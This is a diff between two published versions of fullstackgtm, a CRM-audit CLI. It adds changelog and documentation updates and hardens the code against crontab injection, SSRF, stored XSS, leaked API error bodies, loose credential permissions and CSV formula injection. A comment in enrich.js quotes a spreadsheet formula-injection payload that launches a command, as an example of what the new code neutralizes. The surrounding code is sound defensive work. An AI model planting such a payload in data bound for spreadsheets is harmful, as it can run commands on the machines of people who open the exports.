fullstackgtm 0.25.0 → 0.25.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/CHANGELOG.md CHANGED
@@ -5,6 +5,68 @@ The format follows [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
5
5
  and the project adheres to [Semantic Versioning](https://semver.org/).
6
6
  The path to 1.0 is planned in [docs/roadmap-to-1.0.md](./docs/roadmap-to-1.0.md).
7
7
 
8
+ ## [0.25.2] — 2026-06-15
9
+
10
+ Security hardening I — confirmed fixes from an adversarial audit (each verified
11
+ by a refute-by-default re-attack; the crontab and report fixes took three
12
+ rounds because the re-attack kept finding deeper paths).
13
+
14
+ ### Security
15
+
16
+ - **Crontab injection via `schedule install` (was: arbitrary code execution).**
17
+ `schedule add --label` rejects newlines/control chars; `renderManagedBlock`
18
+ now refuses to render any entry (or CLI invocation) whose interpolated
19
+ fields — label, cron, id, profile, argv, **and the resolved node/script
20
+ path + `FSGTM_HOME`** — carry a control character, so a hand-edited
21
+ `schedules.json` or a newline in `FSGTM_HOME` can no longer inject a live
22
+ crontab line. `parseCron` now accepts ASCII space/tab only (rejects Unicode
23
+ whitespace), and a stray `%` in a path is escaped (`\%`) so it can't truncate
24
+ the managed line.
25
+ - **SSRF in `market capture`.** Page fetches now allow only http/https, refuse
26
+ any host that is or resolves to a private/loopback/link-local/CGNAT/metadata
27
+ address (IPv4, IPv6, and IPv4-mapped IPv6 in dotted or hex form), follow
28
+ redirects manually with per-hop re-validation, and cap time/body size.
29
+ - **Stored XSS in the market HTML report.** The embedded JSON data island is
30
+ serialized with `<`/`>`/`&`/U+2028/U+2029 escaped (no `</script>` breakout),
31
+ the tooltip is built with `textContent` (no `innerHTML`), and the two
32
+ remaining raw sinks (anchor vendor name, evidence-appendix confidence) are
33
+ now `escapeHtml`'d; `validateObservationSet` rejects a non-enum `confidence`
34
+ so an `observe --from` file can't smuggle markup.
35
+ - **Provider response bodies no longer leak into errors.** HubSpot, Salesforce,
36
+ Apollo, and Stripe connectors throw status-line-only errors (a 4xx body can
37
+ echo submitted emails/domains or the key, and these errors are persisted into
38
+ scheduled-run records).
39
+ - **CSV/formula injection neutralized at the enrich write path.** Ingested
40
+ string values beginning with `= + - @` / tab / CR are prefixed with `'` so
41
+ they can't execute if the CRM is later exported to a spreadsheet; numeric
42
+ values keep full fidelity.
43
+ - **Credential-store mode enforced on read, not just write.** A pre-existing
44
+ `credentials.json` with group/other permissions is re-tightened to 0600 (and
45
+ warned) on read, closing the inherited-loose-permissions gap.
46
+
47
+ Known residuals tracked for follow-up: `marketMapToMarkdown` does not
48
+ HTML-escape (safe in terminals/GitHub; only a risk if a downstream renderer
49
+ trusts raw HTML — to be addressed with the report work); the credential read
50
+ check is reactive (a loose file is exposed until the next CLI read).
51
+
52
+ ## [0.25.1] — 2026-06-12
53
+
54
+ Docs-sync release — no code changes.
55
+
56
+ ### Fixed
57
+
58
+ - README, INSTALL_FOR_AGENTS.md, the agent skill, and docs/api.md corrected
59
+ against the shipped surface: the MCP tool list now enumerates all 8 tools
60
+ (read-only vs gated), the builtin rule count is 12, docs/api.md gains a
61
+ Schedule section and the `schedule` command in its CLI list, the README
62
+ cites the 612-run CRM-ops benchmark and the `diff --fail-on-new-findings`
63
+ CI gate, the bulk-update section covers `!~` / `--create-task` /
64
+ `--force-archive-duplicates`, and the skill's verb map completes the
65
+ `schedule`, `market`, and `plans` rows and adds `report`.
66
+ - The 0.23.0 entry below is amended retroactively: `dedupe`, `reassign`,
67
+ `fix`, and `--set <field>=from:<sourceField>` shipped in 0.23.0 without a
68
+ changelog record.
69
+
8
70
  ## [0.25.0] — 2026-06-12
9
71
 
10
72
  ### Added
@@ -136,6 +198,29 @@ everything that shipped 0.19–0.23. (No code changes.)
136
198
  - Every `enrich` subcommand catches `--help`/`-h` before config load,
137
199
  credential resolution, or any network call. No scheduling/cron logic —
138
200
  that is the horizontal schedule layer's job (docs/schedule.md).
201
+ - **Four task-shaped verbs** (entry added retroactively — these shipped in
202
+ 0.23.0 without a changelog record). The 612-run benchmark's gated-agent
203
+ failures clustered into four missing verbs; all four compile to plans
204
+ through the existing plan → approve → apply gate — nothing writes directly.
205
+ - `dedupe <account|contact|deal> --key <domain|email|name>` — duplicate
206
+ groups by normalized identity key, one `merge_records` operation per
207
+ group with a deterministic survivor (`richest` = most populated data
208
+ fields, ties to lowest id; `oldest` = lowest id). High risk, approval
209
+ required; merges are irreversible on apply.
210
+ - `reassign --from <ownerId> --to <ownerId>` — the ownership-handoff
211
+ playbook: one bulk-update-style plan per object type, extra `--where`
212
+ scoping account-lifted for deals/contacts, `--except-deal-stage`
213
+ excluding the stage AND records whose account has an open deal in it —
214
+ re-verified per record at apply time.
215
+ - `fix --rule <id>` — one-shot composite: audit one rule → save → suggest
216
+ → approve only suggestion-backed values at the confidence bar → apply
217
+ (`--yes` required), with a stage-by-stage summary.
218
+ - `bulk-update --set <field>=from:<sourceField>` — per-record derived
219
+ values resolved from the filter view (relational sources like
220
+ `account.ownerId` included); empty-source records are skipped and
221
+ counted, never guessed. Plus the `--archive` duplicate guard: archiving
222
+ a record that shares its identity key with another is refused and
223
+ pointed at `dedupe`, overridable with `--force-archive-duplicates`.
139
224
 
140
225
  ## [0.22.0] — 2026-06-12
141
226
 
@@ -3,6 +3,10 @@
3
3
  Deterministic install-and-verify steps. Every command is non-interactive, every
4
4
  check has an expected output, and nothing here writes to a CRM.
5
5
 
6
+ If your harness supports agent skills, `npx skills add fullstackgtm/core`
7
+ installs the compact operating guide; this document remains the deterministic
8
+ install-and-verify path.
9
+
6
10
  ## 1. Install
7
11
 
8
12
  ```bash
@@ -60,6 +64,11 @@ page texts — every span is checked character-for-character against the stored
60
64
  capture, and paraphrased quotes are rejected. In non-interactive contexts the
61
65
  CLI never prompts — it fails with this guidance.
62
66
 
67
+ Apollo enrichment (`enrich append --source apollo`) needs `APOLLO_API_KEY` in
68
+ the environment, or have the human run `echo "$KEY" | fullstackgtm login apollo`
69
+ once. Without it, `enrich ingest <file> --source clay` still stages push-style
70
+ data keyless.
71
+
63
72
  Provider prerequisites (what the human must create, and which scopes) are in
64
73
  the README's **"Connect your CRM"** section: HubSpot needs a private app with
65
74
  four `crm.objects.*.read` scopes (plus write scopes only for `apply`);
@@ -111,8 +120,12 @@ If the working directory's project already has the peers in its node_modules,
111
120
  the server resolves them from there (peer-dependency semantics) — so this
112
121
  works from inside existing projects too.
113
122
 
114
- Tools exposed over stdio: `fullstackgtm_audit` (read-only),
115
- `fullstackgtm_rules`, `fullstackgtm_apply` (requires `approvedOperationIds`).
123
+ Tools exposed over stdio read-only: `fullstackgtm_audit`,
124
+ `fullstackgtm_rules`, `fullstackgtm_suggest`, `fullstackgtm_call_parse`,
125
+ `fullstackgtm_resolve`, `fullstackgtm_market_worksheet`. Gated:
126
+ `fullstackgtm_apply` (requires explicit `approvedOperationIds`),
127
+ `fullstackgtm_market_observe` (every quoted span is verified against the
128
+ stored captures before anything is appended).
116
129
 
117
130
  ## Troubleshooting
118
131
 
package/README.md CHANGED
@@ -127,7 +127,7 @@ fullstackgtm reassign --from 411 --to 902 --except-deal-stage closing --save #
127
127
  fullstackgtm fix --rule missing-deal-owner --provider hubspot --yes # audit one rule → suggest → approve → apply, one command
128
128
  ```
129
129
 
130
- `bulk-update` filters the snapshot (`=`, `!=`, `~` substring, `:empty`/`:notempty`, `|` any-of, relational pseudo-fields like `account.domain` or `openDealStages`) into a dry-run patch plan — and **the full filter is re-verified per record at apply time**, with mid-apply rechecks, so a record that stopped matching between audit and apply is skipped, not clobbered. Equality filters double as preconditions; `--require` adds explicit ones; `--guard` asserts cross-record conditions; `--max-operations` caps blast radius. `--set field=from:<sourceField>` derives values per record; `--archive` refuses records whose identity key (account domain, contact email) is shared with another record — that's a duplicate, and duplicates are merged with `dedupe`, not archived around.
130
+ `bulk-update` filters the snapshot (`=`, `!=`, `~` substring, `!~` not-substring, `:empty`/`:notempty`, `|` any-of, relational pseudo-fields like `account.domain` or `openDealStages`) into a dry-run patch plan — and **the full filter is re-verified per record at apply time**, with mid-apply rechecks, so a record that stopped matching between audit and apply is skipped, not clobbered. Equality filters double as preconditions; `--require` adds explicit ones; `--guard` asserts cross-record conditions; `--max-operations` caps blast radius. `--set field=from:<sourceField>` derives values per record; `--create-task <text>` is the third change mode, emitting approval-gated `create_task` operations instead of field writes; `--archive` refuses records whose identity key (account domain, contact email) is shared with another record — that's a duplicate, and duplicates are merged with `dedupe`, not archived around (`--force-archive-duplicates` overrides that refusal explicitly).
131
131
 
132
132
  `dedupe` finds duplicate groups by normalized identity key and emits one `merge_records` operation per group with a deterministic survivor (`richest` = most populated fields, ties to lowest id; `oldest`). Merges stay irreversible-and-therefore-low-confidence-capped on approval, exactly like merge suggestions from the audit. `reassign` is the ownership-handoff playbook: one plan per object type, extra scoping account-lifted to deals and contacts, and `--except-deal-stage` excludes both deals in that stage and every record whose account has an open deal in it. `fix` is the one-shot composite for a single rule: audit → save → suggest → approve suggestion-backed operations at the confidence bar → with `--yes`, apply and print the stage-by-stage summary; without it, stop after approval and print the apply command.
133
133
 
@@ -210,12 +210,17 @@ fullstackgtm audit --input snap.json --rules stale-deal --stale-days 45 --json
210
210
 
211
211
  # Gate a nightly CI job or agent run on hygiene: exit 2 if findings ≥ threshold
212
212
  fullstackgtm audit --provider hubspot --fail-on warning
213
+
214
+ # Gate CI on hygiene drift instead: exit 2 only when a NEW (rule, record) finding appears
215
+ fullstackgtm diff --before old.json --after new.json --fail-on-new-findings
213
216
  ```
214
217
 
215
218
  - Finding and operation ids are **stable hashes** of rule + record, so two runs over the same data produce identical ids — agents can diff plans, track findings across runs, and approve operations by id without re-parsing.
216
219
  - `--demo` (with `--seed`) generates a realistic mid-market CRM with injected real-world failure modes — departed owners, unlinked deals, orphan accounts, stale pipeline — so agents and CI can exercise the full snapshot → audit → apply pipeline with zero credentials.
217
220
  - Exit codes: `0` success, `1` error, `2` findings at/above `--fail-on`.
218
221
 
222
+ "Built for agents" is measured, not asserted: a 612-run benchmark (17 scenarios × 3 tool-surface arms × 4 trials, deterministic graders over final CRM state, τ-bench-style pass^k) shows the gated CLI surface beating raw CRM-API access on completion-under-policy for every model tested. Full matrix and methodology: [the leaderboard](./evals/crm/leaderboard/RESULTS.md).
223
+
219
224
  ## Authentication: CLI-first, browser only at the consent moment
220
225
 
221
226
  Credential resolution is a ladder — the first rung that yields a token wins:
@@ -297,7 +302,7 @@ The Stripe connector only reads customers and subscriptions, and `apply` is read
297
302
  | Concept | What it is |
298
303
  |---|---|
299
304
  | **Canonical snapshot** | Provider-independent view of users, accounts, contacts, deals, activities. Records carry `identities` — `(provider, externalId)` claims — so the same real-world entity can be tracked across several systems. |
300
- | **Audit rule** | A deterministic function `(context) => { findings, operations }`. Eleven built-ins cover orphan accounts, ownerless/unlinked/amount-less deals, past close dates, stale pipeline, duplicates, and more — `fullstackgtm rules` lists them all. Write your own in ~10 lines. |
305
+ | **Audit rule** | A deterministic function `(context) => { findings, operations }`. Twelve built-ins cover orphan accounts, ownerless/unlinked/amount-less deals, past close dates, stale pipeline, duplicates, and more — `fullstackgtm rules` lists them all. Write your own in ~10 lines. |
301
306
  | **Patch plan** | The dry-run output of an audit: findings plus typed patch operations with before/after values, reasons, risk levels, and approval flags. Always a proposal, never a mutation. |
302
307
  | **Connector** | A provider adapter: `fetchSnapshot()` for reads, optional `applyOperation()` for writes. HubSpot and Salesforce reference connectors ship in the package; connectors never drop records they can't fully resolve — the audit flags them instead. |
303
308
  | **Patch plan run** | The audit record of one apply attempt: per-operation applied/failed/skipped results. |
@@ -396,7 +401,13 @@ Or configure any MCP client (Cursor, Claude Desktop, …) with:
396
401
  }
397
402
  ```
398
403
 
399
- Exposes `fullstackgtm_audit` (read-only; sample, demo, file, or live provider sources with optional rule scoping), `fullstackgtm_rules` (rule discovery), and `fullstackgtm_apply` (requires explicit `approvedOperationIds`) over stdio. Tokens stored via `fullstackgtm login` are picked up automatically — the env var is only needed when no stored login exists.
404
+ Eight tools are exposed over stdio.
405
+
406
+ **Read-only:** `fullstackgtm_audit` (sample, demo, file, or live provider sources with optional rule scoping), `fullstackgtm_rules` (rule discovery), `fullstackgtm_suggest` (deterministic placeholder values with confidence + reasons), `fullstackgtm_call_parse` (transcripts → provenance-marked segments, insights, and evidence), `fullstackgtm_resolve` (the create gate: exists / ambiguous / safe_to_create), and `fullstackgtm_market_worksheet` (the classification packet for one vendor: claims, judging rules, captured page texts).
407
+
408
+ **Gated:** `fullstackgtm_apply` (requires explicit `approvedOperationIds`; placeholders still need value overrides) and `fullstackgtm_market_observe` (verifies every quoted span against the stored captures before appending — nothing is stored unless the whole set passes).
409
+
410
+ Tokens stored via `fullstackgtm login` are picked up automatically — the env var is only needed when no stored login exists.
400
411
 
401
412
  ## Safety model
402
413
 
package/dist/cli.js CHANGED
@@ -27,7 +27,7 @@ import { marketMapToHtml, marketMapToMarkdown } from "./marketReport.js";
27
27
  import { DEFAULT_RUBRIC, detectProviderFromKey, extractInsightsLlm, parseRubric, resolveLlmCredential, scoreCallLlm, validateLlmKey, } from "./llm.js";
28
28
  import { buildEnrichPlan, createFileEnrichRunStore, DEFAULT_STALE_DAYS, ENRICH_CONFIG_FILE_NAME, enrichRunId, inferIngestObjectType, latestStamps, loadEnrichConfig, parseCsv, resolveCrmField, selectStaleWork, stagedSourceRecords, staleDaysFor, } from "./enrich.js";
29
29
  import { apolloPullKeysForAppend, apolloPullKeysForRefresh, createApolloClient, pullApolloRecords, } from "./enrichApollo.js";
30
- import { computeMissedFirings, createFileScheduleRunStore, createFileScheduleStore, nextCronFiring, parseCron, renderManagedBlock, replaceManagedBlock, scheduleId, systemCrontabIo, tokenizeCommand, validateSchedulableArgv, } from "./schedule.js";
30
+ import { computeMissedFirings, createFileScheduleRunStore, createFileScheduleStore, nextCronFiring, parseCron, renderManagedBlock, replaceManagedBlock, assertSingleLineLabel, hasControlChar, scheduleId, systemCrontabIo, tokenizeCommand, validateSchedulableArgv, } from "./schedule.js";
31
31
  import { resolveRecord } from "./resolve.js";
32
32
  import { buildBulkUpdatePlan } from "./bulkUpdate.js";
33
33
  import { buildDedupePlan } from "./dedupe.js";
@@ -1614,6 +1614,7 @@ trigger: manual. status shows next firing and surfaces missed firings
1614
1614
  const createdAt = new Date().toISOString();
1615
1615
  const label = option(rest, "--label") ??
1616
1616
  argv.filter((arg) => !arg.startsWith("--")).slice(0, 2).join("-").replace(/[^\w.-]+/g, "-");
1617
+ assertSingleLineLabel(label);
1617
1618
  const entry = {
1618
1619
  id: scheduleId(label, cron.source, argv, createdAt),
1619
1620
  label,
@@ -1819,13 +1820,27 @@ function scheduleCliInvocation() {
1819
1820
  if (!script || !existsSync(script)) {
1820
1821
  throw new Error("Cannot resolve the fullstackgtm entry point for crontab lines (process.argv[1] is missing).");
1821
1822
  }
1823
+ // A newline/control char in any of these flows verbatim into the crontab
1824
+ // executable line; single-quote escaping defends the shell, not cron's line
1825
+ // parser. Refuse early with a clear message (renderManagedBlock re-checks).
1826
+ for (const [name, value] of [
1827
+ ["FSGTM_HOME", process.env.FSGTM_HOME],
1828
+ ["the node executable path", process.execPath],
1829
+ ["the CLI script path", script],
1830
+ ]) {
1831
+ if (value && hasControlChar(value)) {
1832
+ throw new Error(`Cannot install schedules: ${name} contains a newline or control character.`);
1833
+ }
1834
+ }
1822
1835
  const quote = (value) => `'${value.replace(/'/g, `'\\''`)}'`;
1823
1836
  const parts = [quote(process.execPath)];
1824
1837
  if (script.endsWith(".ts"))
1825
1838
  parts.push("--experimental-strip-types");
1826
1839
  parts.push(quote(script));
1827
1840
  const home = process.env.FSGTM_HOME ? `FSGTM_HOME=${quote(process.env.FSGTM_HOME)} ` : "";
1828
- return home + parts.join(" ");
1841
+ // cron treats an unescaped `%` in the command field as a newline/stdin split.
1842
+ // Escape it as `\%` so a stray `%` in a path can't truncate the managed line.
1843
+ return (home + parts.join(" ")).replace(/%/g, "\\%");
1829
1844
  }
1830
1845
  /**
1831
1846
  * The single provider entry point: execute the scheduled command in-process
@@ -44,8 +44,11 @@ export function createHubspotConnector(options) {
44
44
  throw new Error(`Cannot reach HubSpot at ${baseUrl}${cause}. Check network access.`);
45
45
  }
46
46
  if (!response.ok) {
47
- const body = await response.text();
48
- throw new Error(`HubSpot API error ${response.status}: ${body}`);
47
+ // Status line only — HubSpot 4xx bodies echo submitted property values
48
+ // (contact emails, company domains) and the request payload, and these
49
+ // errors are persisted into scheduled-run records. Never interpolate it.
50
+ await response.text().catch(() => undefined);
51
+ throw new Error(`HubSpot API error ${response.status}. Check the token scopes and request.`);
49
52
  }
50
53
  // DELETE and some association writes return 204 with an empty body.
51
54
  const text = await response.text();
@@ -46,8 +46,10 @@ export function createSalesforceConnector(options) {
46
46
  throw new Error(`Cannot reach Salesforce at ${connection.instanceUrl}${cause}. Check SALESFORCE_INSTANCE_URL (your My Domain URL, e.g. https://yourco.my.salesforce.com) and network access.`);
47
47
  }
48
48
  if (!response.ok) {
49
- const body = await response.text();
50
- throw new Error(`Salesforce API error ${response.status}: ${body}`);
49
+ // Status line only — the body echoes submitted field values and the
50
+ // request, and these errors are persisted into scheduled-run records.
51
+ await response.text().catch(() => undefined);
52
+ throw new Error(`Salesforce API error ${response.status}. Check the token and request.`);
51
53
  }
52
54
  // Salesforce PATCH returns 204 No Content on success.
53
55
  const text = await response.text();
@@ -26,8 +26,10 @@ export function createStripeConnector(options) {
26
26
  headers: { Authorization: `Bearer ${apiKey}` },
27
27
  });
28
28
  if (!response.ok) {
29
- const body = await response.text();
30
- throw new Error(`Stripe API error ${response.status}: ${body}`);
29
+ // Status line only — the body can echo request details bound to a live
30
+ // billing key, and these errors land in scheduled-run records.
31
+ await response.text().catch(() => undefined);
32
+ throw new Error(`Stripe API error ${response.status}. Check the restricted key and request.`);
31
33
  }
32
34
  return response.json();
33
35
  }
@@ -1,4 +1,4 @@
1
- import { chmodSync, existsSync, mkdirSync, readdirSync, readFileSync, unlinkSync, writeFileSync, } from "node:fs";
1
+ import { chmodSync, existsSync, mkdirSync, readdirSync, readFileSync, statSync, unlinkSync, writeFileSync, } from "node:fs";
2
2
  import { homedir } from "node:os";
3
3
  import { join } from "node:path";
4
4
  import { refreshHubspotToken } from "./connectors/hubspotAuth.js";
@@ -98,8 +98,29 @@ export function writeSecureFile(path, contents) {
98
98
  // Non-POSIX filesystems ignore chmod.
99
99
  }
100
100
  }
101
+ /**
102
+ * The 0600/0700 guarantee was write-only: a credentials.json inherited at
103
+ * looser permissions (a restored backup, a file created by another tool, a
104
+ * cloned home) was read and trusted regardless of its actual mode. Enforce the
105
+ * mode on read too — re-tighten to 0600 and warn once — so a world-readable
106
+ * credential store can't sit there silently leaking the token to other users.
107
+ */
108
+ function enforceCredentialFileMode(path) {
109
+ try {
110
+ const mode = statSync(path).mode & 0o777;
111
+ if ((mode & 0o077) !== 0) {
112
+ chmodSync(path, 0o600);
113
+ console.error(`fullstackgtm: tightened ${path} from ${mode.toString(8).padStart(3, "0")} to 600 ` +
114
+ "(it was readable or writable by other users).");
115
+ }
116
+ }
117
+ catch {
118
+ // Missing file or non-POSIX filesystem: nothing to enforce.
119
+ }
120
+ }
101
121
  function readFile() {
102
122
  try {
123
+ enforceCredentialFileMode(credentialsPath());
103
124
  const parsed = JSON.parse(readFileSync(credentialsPath(), "utf8"));
104
125
  if (parsed && typeof parsed === "object" && parsed.version === 1 && parsed.providers) {
105
126
  return parsed;
package/dist/enrich.js CHANGED
@@ -291,6 +291,28 @@ function valueToString(value) {
291
291
  return String(value);
292
292
  return "";
293
293
  }
294
+ /**
295
+ * CSV/formula-injection neutralization for string values destined for a CRM
296
+ * write. Third-party export rows (Clay CSV, webhook JSON) can contain cells
297
+ * like `=cmd|'/c calc'!A1` or `@SUM(...)`; written verbatim to a CRM field they
298
+ * lie dormant until someone exports the CRM to CSV and opens it in a spreadsheet,
299
+ * where the leading `= + - @` (or a leading tab/CR) makes the client execute it.
300
+ * We prefix a single apostrophe — the spreadsheet-standard escape that renders
301
+ * the cell as literal text. Numeric values bypass this (they're written as
302
+ * numbers, not strings), so signed numbers keep full fidelity; a phone number
303
+ * supplied as a string and starting with `+` gains a leading `'`, which the
304
+ * human sees in the approved diff. Applied only at the write path, never to
305
+ * match keys.
306
+ */
307
+ function neutralizeFormulaInjection(value) {
308
+ if (value && /^[=+\-@\t\r]/.test(value))
309
+ return `'${value}`;
310
+ return value;
311
+ }
312
+ /** valueToString for a value that will be written to a CRM field. */
313
+ function writeSafeString(value) {
314
+ return neutralizeFormulaInjection(valueToString(value));
315
+ }
294
316
  function normalizeKeyValue(key, value) {
295
317
  const text = valueToString(value).toLowerCase();
296
318
  if (!text)
@@ -498,7 +520,7 @@ export function buildEnrichPlan(options) {
498
520
  operation: "set_field",
499
521
  field: canonicalField,
500
522
  beforeValue: currentValue ?? null,
501
- afterValue: typeof sourceValue === "number" ? sourceValue : valueToString(sourceValue),
523
+ afterValue: typeof sourceValue === "number" ? sourceValue : writeSafeString(sourceValue),
502
524
  reason: `${source} ${record.objectType} "${describeSourceRecord(record)}" (matched by ` +
503
525
  `${outcome.matchedKey}) reports a changed value for ${canonicalField}.`,
504
526
  sourceRuleOrPolicy: `enrich:${source}:${canonicalField}`,
@@ -516,7 +538,7 @@ export function buildEnrichPlan(options) {
516
538
  if (!isEmptyValue(currentValue))
517
539
  continue;
518
540
  emittedForRecord = true;
519
- const afterValue = typeof sourceValue === "number" ? sourceValue : valueToString(sourceValue);
541
+ const afterValue = typeof sourceValue === "number" ? sourceValue : writeSafeString(sourceValue);
520
542
  operations.push({
521
543
  id: `op_enr_${fnv1a(`${source}:${record.objectType}:${outcome.recordId}:${canonicalField}`)}`,
522
544
  objectType: canonicalObjectType(record.objectType),
@@ -56,9 +56,12 @@ export function createApolloClient(options) {
56
56
  if (response.status === 404)
57
57
  return null;
58
58
  if (!response.ok) {
59
- const body = await response.text();
59
+ // Status line only — never interpolate the response body. It can echo
60
+ // the submitted query (contact emails / company domains) or the API key,
61
+ // and these errors are persisted verbatim into scheduled-run records.
62
+ await response.text().catch(() => undefined);
60
63
  const exhausted = response.status === 429 ? ` (rate limited; ${maxRetries} retries exhausted)` : "";
61
- throw new Error(`Apollo API error ${response.status}${exhausted}: ${body}`);
64
+ throw new Error(`Apollo API error ${response.status}${exhausted}. Check the API key and request.`);
62
65
  }
63
66
  const text = await response.text();
64
67
  return text ? JSON.parse(text) : null;
package/dist/market.d.ts CHANGED
@@ -153,6 +153,7 @@ export type FetchPage = (url: string) => Promise<{
153
153
  status: number;
154
154
  body: string;
155
155
  }>;
156
+ export declare function assertPublicUrl(rawUrl: string): Promise<URL>;
156
157
  export type CaptureOptions = {
157
158
  /** Directory for captures; defaults to <marketHome>/captures. */
158
159
  dir?: string;
package/dist/market.js CHANGED
@@ -1,5 +1,7 @@
1
1
  import { createHash } from "node:crypto";
2
+ import { lookup } from "node:dns/promises";
2
3
  import { existsSync, mkdirSync, readFileSync, readdirSync, writeFileSync } from "node:fs";
4
+ import { isIP } from "node:net";
3
5
  import { join } from "node:path";
4
6
  import { credentialsDir } from "./credentials.js";
5
7
  const INTENSITY_RANK = {
@@ -141,15 +143,144 @@ export function extractReadableText(html) {
141
143
  .filter(Boolean)
142
144
  .join("\n");
143
145
  }
146
+ /**
147
+ * SSRF guard. market.config.json URLs are operator-authored, but configs are
148
+ * shared/templated in consulting/team use and `market capture|refresh` is on
149
+ * the cron allowlist — an unguarded fetch is an unattended internal-network
150
+ * and cloud-metadata probe. We therefore (1) allow only http/https, (2) refuse
151
+ * any host that is or resolves to a private/loopback/link-local/metadata
152
+ * address, and (3) follow redirects manually, re-validating each hop.
153
+ *
154
+ * Residual gap (documented, not defended here): TOCTOU DNS rebinding between
155
+ * our lookup and fetch's own resolution. Out of scope for fetching public
156
+ * competitor pages; a hardened deployment should fetch through an egress proxy.
157
+ */
158
+ const MAX_REDIRECTS = 5;
159
+ const FETCH_TIMEOUT_MS = 15_000;
160
+ const MAX_BODY_BYTES = 5_000_000;
161
+ function ipv4IsPrivate(ip) {
162
+ const parts = ip.split(".").map((n) => Number(n));
163
+ if (parts.length !== 4 || parts.some((n) => !Number.isInteger(n) || n < 0 || n > 255))
164
+ return true;
165
+ const [a, b] = parts;
166
+ if (a === 0 || a === 127)
167
+ return true; // this-host, loopback
168
+ if (a === 10)
169
+ return true; // private
170
+ if (a === 172 && b >= 16 && b <= 31)
171
+ return true; // private
172
+ if (a === 192 && b === 168)
173
+ return true; // private
174
+ if (a === 169 && b === 254)
175
+ return true; // link-local incl. 169.254.169.254 metadata
176
+ if (a === 100 && b >= 64 && b <= 127)
177
+ return true; // CGNAT
178
+ if (a >= 224)
179
+ return true; // multicast / reserved
180
+ return false;
181
+ }
182
+ function ipIsPrivate(ip) {
183
+ const family = isIP(ip);
184
+ if (family === 4)
185
+ return ipv4IsPrivate(ip);
186
+ if (family === 6) {
187
+ const lower = ip.toLowerCase();
188
+ if (lower === "::1" || lower === "::")
189
+ return true; // loopback / unspecified
190
+ // IPv4-mapped (::ffff:…) — Node normalizes ::ffff:127.0.0.1 to ::ffff:7f00:1,
191
+ // so accept both the dotted and the hex-pair forms, unwrap, check the v4.
192
+ const mapped = lower.match(/^::ffff:(.+)$/);
193
+ if (mapped) {
194
+ const rest = mapped[1];
195
+ if (rest.includes("."))
196
+ return ipv4IsPrivate(rest);
197
+ const groups = rest.split(":");
198
+ if (groups.length === 2) {
199
+ const hi = parseInt(groups[0], 16);
200
+ const lo = parseInt(groups[1], 16);
201
+ if (Number.isNaN(hi) || Number.isNaN(lo))
202
+ return true;
203
+ return ipv4IsPrivate(`${(hi >> 8) & 0xff}.${hi & 0xff}.${(lo >> 8) & 0xff}.${lo & 0xff}`);
204
+ }
205
+ return true; // unrecognized mapped form → refuse
206
+ }
207
+ if (lower.startsWith("fe8") || lower.startsWith("fe9") || lower.startsWith("fea") || lower.startsWith("feb"))
208
+ return true; // link-local fe80::/10
209
+ if (lower.startsWith("fc") || lower.startsWith("fd"))
210
+ return true; // unique-local fc00::/7
211
+ return false;
212
+ }
213
+ return true; // not a recognizable IP literal → refuse
214
+ }
215
+ export async function assertPublicUrl(rawUrl) {
216
+ let url;
217
+ try {
218
+ url = new URL(rawUrl);
219
+ }
220
+ catch {
221
+ throw new Error(`market capture: "${rawUrl}" is not a valid URL.`);
222
+ }
223
+ if (url.protocol !== "http:" && url.protocol !== "https:") {
224
+ throw new Error(`market capture refuses ${url.protocol} URLs (only http/https): ${rawUrl}`);
225
+ }
226
+ const host = url.hostname.replace(/^\[|\]$/g, ""); // strip IPv6 brackets
227
+ if (isIP(host)) {
228
+ if (ipIsPrivate(host))
229
+ throw new Error(`market capture refuses private/loopback address ${host} (SSRF guard).`);
230
+ return url;
231
+ }
232
+ // Hostname: resolve and refuse if ANY address is private.
233
+ const addrs = await lookup(host, { all: true });
234
+ for (const { address } of addrs) {
235
+ if (ipIsPrivate(address)) {
236
+ throw new Error(`market capture refuses ${host} — it resolves to private/internal address ${address} (SSRF guard).`);
237
+ }
238
+ }
239
+ return url;
240
+ }
144
241
  const defaultFetchPage = async (url) => {
145
- const response = await fetch(url, {
146
- headers: {
147
- "User-Agent": "fullstackgtm-market/0 (+https://github.com/fullstackgtm/core)",
148
- "Accept-Language": "en-US",
149
- },
150
- redirect: "follow",
151
- });
152
- return { status: response.status, body: await response.text() };
242
+ let current = url;
243
+ for (let hop = 0; hop <= MAX_REDIRECTS; hop++) {
244
+ await assertPublicUrl(current);
245
+ const controller = new AbortController();
246
+ const timer = setTimeout(() => controller.abort(), FETCH_TIMEOUT_MS);
247
+ let response;
248
+ try {
249
+ response = await fetch(current, {
250
+ headers: {
251
+ "User-Agent": "fullstackgtm-market/0 (+https://github.com/fullstackgtm/core)",
252
+ "Accept-Language": "en-US",
253
+ },
254
+ redirect: "manual",
255
+ signal: controller.signal,
256
+ });
257
+ }
258
+ finally {
259
+ clearTimeout(timer);
260
+ }
261
+ if (response.status >= 300 && response.status < 400 && response.headers.get("location")) {
262
+ current = new URL(response.headers.get("location"), current).toString();
263
+ continue; // re-validate the redirect target on the next iteration
264
+ }
265
+ const reader = response.body?.getReader();
266
+ if (!reader)
267
+ return { status: response.status, body: await response.text() };
268
+ const chunks = [];
269
+ let total = 0;
270
+ for (;;) {
271
+ const { done, value } = await reader.read();
272
+ if (done)
273
+ break;
274
+ total += value.length;
275
+ if (total > MAX_BODY_BYTES) {
276
+ await reader.cancel();
277
+ break;
278
+ }
279
+ chunks.push(value);
280
+ }
281
+ return { status: response.status, body: Buffer.concat(chunks).toString("utf8") };
282
+ }
283
+ throw new Error(`market capture: too many redirects (>${MAX_REDIRECTS}) for ${url}`);
153
284
  };
154
285
  export async function captureMarket(config, options = {}) {
155
286
  const dir = options.dir ?? join(marketHome(config.category), "captures");
@@ -284,6 +415,11 @@ export function validateObservationSet(config, set) {
284
415
  if (!INTENSITY_RANK[obs.intensity] && obs.intensity !== "unobservable") {
285
416
  problems.push(`${cell}: invalid intensity "${obs.intensity}"`);
286
417
  }
418
+ // confidence is rendered into the HTML report; only the enum is allowed, so
419
+ // an `observe --from` file can't smuggle markup through a free-text value.
420
+ if (obs.confidence !== "high" && obs.confidence !== "medium" && obs.confidence !== "low") {
421
+ problems.push(`${cell}: invalid confidence "${String(obs.confidence)}" (expected high, medium, or low)`);
422
+ }
287
423
  if ((obs.intensity === "loud" || obs.intensity === "quiet") && obs.evidence.length === 0) {
288
424
  problems.push(`${cell}: ${obs.intensity} reading with no quoted evidence`);
289
425
  }
